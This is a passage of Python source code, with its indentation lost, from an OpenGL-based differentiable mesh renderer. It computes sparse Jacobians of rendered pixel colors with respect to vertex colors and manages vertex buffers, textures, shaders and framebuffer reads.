d_final_outside = self.d_final_outside
barycentricVertsIntersect = self.barycentricVertsIntersect
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility!=4294967295)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool),:].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage)&(visibility !=4294967295 )]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1,1,1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
#Computing gradients:
#A multisampled pixel color is given by: w R + (1-w) R' thus:
#1 derivatives samples outside wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
#2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
#3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
#4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
#5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
#6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
#7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
#for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
####### 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
dImage_wrt_outside_vc_outside = d_final_outside[:,None] * sampleBarycentric[facesOutsideBnd] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 3)).ravel()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_outside.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_bnd_outside = result
# result_wrt_vc_bnd_outside.sum_duplicates()
######## 5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
dImage_wrt_outside_vc_edge = (1-d_final_outside[:, None]) * np.c_[barycentricVertsIntersect, 1-barycentricVertsIntersect] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2)).ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()
faces = np.tile(faces.reshape([1,-1,2]),[self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_edge.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_vc_bnd_outside_edge = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
# result_wrt_vc_bnd_outside_edge.sum_duplicates()
######## 7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
dImage_wrt_outside_vc_inside = sampleBarycentric[facesInsideBnd] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesInsideBnd]
IS = np.tile(col(pixels), (1, 3)).ravel()
faces = f[sampleFaces[facesInsideBnd]].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_inside.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_vc_bnd_inside = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
# result_wrt_vc_bnd_inside.sum_duplicates()
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
# barySample = self.renders_sample_barycentric[0].reshape([-1,3])[(~boundaryImage)&(visibility !=4294967295 ).ravel().astype(np.bool), :]
bc = barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))
# barySample[barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))]
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.where(((~boundaryImage)&(visibility !=4294967295 )).ravel())[0]
IS = np.tile(col(pixels), (1, 3)).ravel()
JS = col(f[nonBoundaryFaces].ravel())
bc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
# bc = barySample.reshape((-1, 3))
data = np.asarray(bc, order='C').ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
# IS = np.concatenate((IS*3, IS*3+1, IS*3+2))
# JS = np.concatenate((JS*3, JS*3+1, JS*3+2))
# data = np.concatenate((data, data, data))
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_nonbnd = result
# result_wrt_vc_nonbnd.sum_duplicates()
if np.any(boundaryImage):
# result_wrt_verts = result_wrt_verts_bar_outside_edge
# result_wrt_verts = result_wrt_verts_nonbnd
result_wrt_vc = result_wrt_vc_bnd_outside + result_wrt_vc_bnd_outside_edge + result_wrt_vc_bnd_inside + result_wrt_vc_nonbnd
# result_wrt_vc = sp.csc_matrix((width * height * num_channels, vc_size))
else:
# result_wrt_verts = sp.csc_matrix((image_width*image_height*n_channels, num_verts*2))
result_wrt_vc = result_wrt_vc_nonbnd
# result_wrt_vc = sp.csc_matrix((width * height * num_channels, vc_size))
return result_wrt_vc
def on_changed(self, which):
super().on_changed(which)
if 'v' or 'camera' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_verts_mesh[mesh][polygons].set_array(verts_by_face.astype(np.float32))
self.vbo_verts_mesh[mesh][polygons].bind()
if 'vc' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
flen = 1
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
# fc = np.arange(flen, flen + len(f))
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
self.vbo_face_ids_list[mesh][polygons].set_array(fc)
self.vbo_face_ids_list[mesh][polygons].bind()
flen += len(f)
self.vbo_indices_mesh_list[mesh][polygons].set_array(np.array(self.f_list[mesh][polygons]).astype(np.uint32))
self.vbo_indices_mesh_list[mesh][polygons].bind()
if 'texture_stack' in which:
# gl = self.glf
# texture_data = np.array(self.texture_image*255., dtype='uint8', order='C')
# self.release_textures()
#
# for mesh in range(len(self.f_list)):
# textureIDs = []
# for polygons in range(len(self.f_list[mesh])):
# texture = None
# if self.haveUVs_list[mesh][polygons]:
# texture = GL.GLuint(0)
# GL.glGenTextures( 1, texture )
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# #Send texture.
# #Pol: Check if textures are float or uint from Blender import.
# image = (self.textures_list[mesh][polygons]*255.0).astype(np.uint8)
# GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB8, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_UNSIGNED_BYTE, image)
# textureIDs = textureIDs + [texture]
# self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs]
# gl.GenTextures(1, tmp) # TODO: free after done
# self.textureID = tmp[0]
if self.initialized:
textureCoordIdx = 0
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
#Update the OpenGL textures with all the textures. (Inefficient as many might not have changed).
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
self.textures_list[mesh][polygons] = self.texture_stack[textureCoordIdx:image.size+textureCoordIdx].reshape(image.shape)
textureCoordIdx = textureCoordIdx + image.size
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_UNSIGNED_BYTE,
image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
if 'v' or 'f' or 'vc' or 'ft' or 'camera' or 'texture_stack' in which:
self.render_image_buffers()
def release_textures(self):
if hasattr(self, 'textureID_mesh_list'):
if self.textureID_mesh_list != []:
for texture_mesh in self.textureID_mesh_list:
if texture_mesh != []:
for texture in texture_mesh:
if texture != None:
GL.glDeleteTextures(1, [texture.value])
self.textureID_mesh_list = []
@depends_on(dterms+terms)
def color_image(self):
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image(with_vertex_colors=True, with_texture_on=True)
return no_overdraw
# if not self.overdraw:
# return no_overdraw
#
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
# overdraw = self.draw_color_image()
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
#
# # return overdraw * np.atleast_3d(self.boundarybool_image)
#
# boundarybool_image = self.boundarybool_image
# if self.num_channels > 1:
# boundarybool_image = np.atleast_3d(boundarybool_image)
#
# return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
@depends_on('f', 'frustum', 'camera', 'overdraw')
def barycentric_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_barycentric_image(self.boundarybool_image if self.overdraw else None)
@depends_on('f', 'frustum', 'camera', 'overdraw')
def visibility_image(self):
self._call_on_changed()
#Overload method to call without overdraw.
return self.draw_visibility_image(self.v.r, self.f, self.boundarybool_image if self.overdraw else None)
def image_mesh_bool(self, meshes):
self.makeCurrentContext()
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for mesh in meshes:
self.draw_index(mesh)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result!=0
@depends_on(dterms+terms)
def indices_image(self):
self._call_on_changed()
self.makeCurrentContext()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for index in range(len(self.f_list)):
self.draw_index(index)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result
def draw_index(self, index):
mesh = index
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
vc = self.vc_list[mesh]
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(vc.reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
colors = np.array(np.ones_like(colors_by_face) * (index) / 255.0, dtype=np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
def draw_texcoord_image(self, v, f, ft, boundarybool_image=None):
# gl = glf
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
self.makeCurrentContext()
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# want vtc: texture-coordinates per vertex (not per element in vc)
colors = ft
#use the third channel to identify the corresponding textures.
color3 = np.vstack([np.ones([self.ft_list[mesh].shape[0],1])*mesh for mesh in range(len(self.ft_list))]).astype(np.float32) / len(self.ft_list)
colors = np.asarray(np.hstack((colors, color3)), np.float64, order='C')
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
#Why do we need this?
if boundarybool_image is not None:
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3)[:,:,:3].astype(np.float64))/255.0
result[:,:,1] = 1. - result[:,:,1]
return result
@depends_on('ft', 'textures')
def mesh_tex_coords(self):
ftidxs = self.ft.ravel()
data = self.ft
# Pol: careful with this:
data[:,1] = 1.0 - 1.0*data[:,1]
return data
# Depends on 'f' because vpe/fpe depend on f
# Pol: Check that depends on works on other attributes that depend_on x, if x changes.
@depends_on( 'ft', 'f')
def wireframe_tex_coords(self):
print("wireframe_tex_coords is being computed!")
vvt = np.zeros((self.v.r.size/3,2), dtype=np.float64, order='C')
vvt[self.f.flatten()] = self.mesh_tex_coords
edata = np.zeros((self.vpe.size,2), dtype=np.float64, order='C')
edata = vvt[self.ma.ravel()]
return edata
# TODO: can this not be inherited from base? turning off texture mapping in that instead?
@depends_on(dterms+terms)
def boundaryid_image(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
def draw_color_image(self, with_vertex_colors=True, with_texture_on=True):
self.makeCurrentContext()
self._call_on_changed()
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vc = colors_by_face
if with_vertex_colors:
colors = vc.astype(np.float32)
else:
# Only texture.
colors = np.ones_like(vc).astype(np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
if with_texture_on and self.haveUVs_list[mesh][polygons]:
GL.glUseProgram(self.colorTextureProgram)
texture = self.textureID_mesh_list[mesh][polygons]
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureID, 0)
else:
GL.glUseProgram(self.colorProgram)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'], GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['height'],3).astype(np.float64))/255.0
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0.,0.,0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1,1,3))
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image_quantized(self):
texcoord_image = self.texcoord_image[:,:, :2].copy()
#Temprary:
self.texture_image = self.textures_list[0][0].r.copy()
texcoord_image[:,:,0] *= self.texture_image.shape[1]-1
texcoord_image[:,:,1] *= self.texture_image.shape[0]-1
texture_idx = (self.texcoord_image[:,:,2]*len(self.ft_list)).astype(np.uint32)
texcoord_image = np.round(texcoord_image)
texcoord_image = texcoord_image[:,:,0] + texcoord_image[:,:,1]*self.texture_image.shape[1]
return texcoord_image, texture_idx
def checkBufferNum(self):
GL.glGenBuffers(1)
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image(self):
return self.draw_texcoord_image(self.v.r, self.f, self.ft, self.boundarybool_image if self.overdraw else None)
class ResidualRenderer(ColoredRenderer):
terms = 'f', 'frustum', 'vt', 'ft', 'background_image', 'overdraw', 'ft_list', 'haveUVs_list', 'textures_list', 'vc_list', 'imageGT'
dterms = 'vc', 'camera', 'bgcolor', 'texture_stack', 'v'
def __init__(self):
super().__init__()
def clear(self):
try:
GL.glFlush()
GL.glFinish()
# print ("Clearing textured renderer.")
# for msh in self.vbo_indices_mesh_list:
# for vbo in msh:
# vbo.set_array([])
[vbo.set_array(np.array([])) for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_indices_mesh_list for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_colors_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_verts_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.bind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.delete() for sublist in self.vbo_uvs_mesh for vbo in sublist]
[vbo.set_array(np.array([])) for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.bind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.unbind() for sublist in self.vbo_face_ids_list for vbo in sublist]
[vbo.delete() for sublist in self.vbo_face_ids_list for vbo in sublist]
[GL.glDeleteVertexArrays(1, [vao.value]) for sublist in self.vao_tex_mesh_list for vao in sublist]
self.release_textures()
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
GL.glDeleteProgram(self.colorTextureProgram)
super().clear()
except:
import pdb
pdb.set_trace()
print("Program had not been initialized")
def initGLTexture(self):
print("Initializing Texture OpenGL.")
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
//#extension GL_EXT_shader_image_load_store : enable
in vec3 theColor;
in vec2 UV;
uniform sampler2D myTextureSampler;
// Ouput data
out vec3 color;
void main(){
color = theColor * texture2D( myTextureSampler, UV).rgb;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
layout(location = 2) in vec2 vertexUV;
uniform mat4 MVP;
out vec3 theColor;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
UV = vertexUV;
}""", GL.GL_VERTEX_SHADER)
self.colorTextureProgram = shaders.compileProgram(VERTEX_SHADER, FRAGMENT_SHADER)
# Define the other VAO/VBOs and shaders.
# Text VAO and bind color, vertex indices AND uvbuffer:
position_location = GL.glGetAttribLocation(self.colorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorTextureProgram, 'color')
uvs_location = GL.glGetAttribLocation(self.colorTextureProgram, 'vertexUV')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_texture_location = GL.glGetUniformLocation(self.colorTextureProgram, 'MVP')
self.vbo_indices_mesh_list = []
self.vbo_colors_mesh = []
self.vbo_verts_mesh = []
self.vao_tex_mesh_list = []
self.vbo_uvs_mesh = []
self.textureID_mesh_list = []
# GL.glEnable(GL.GL_LINE_SMOOTH)
# GL.glHint(GL.GL_LINE_SMOOTH_HINT, GL.GL_NICEST)
GL.glLineWidth(2.)
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_indices_mesh = []
vbo_face_ids_mesh = []
vbo_colors_mesh = []
vbo_vertices_mesh = []
vbo_uvs_mesh = []
textureIDs_mesh = []
for polygons in range(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_verts = vbo.VBO(np.array(verts_by_face).astype(np.float32))
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_colors = vbo.VBO(np.array(colors_by_face).astype(np.float32))
uvs_by_face = np.asarray(self.ft_list[mesh].reshape((-1, 2))[f.ravel()], dtype=np.float32, order='C')
vbo_uvs = vbo.VBO(np.array(uvs_by_face).astype(np.float32))
vbo_indices = vbo.VBO(np.array(self.f_list[mesh][polygons]).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
vbo_indices.bind()
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
if self.haveUVs_list[mesh][polygons]:
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# Textures:
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = GL.GLuint(0)
GL.glGenTextures(1, texture)
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT, 1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
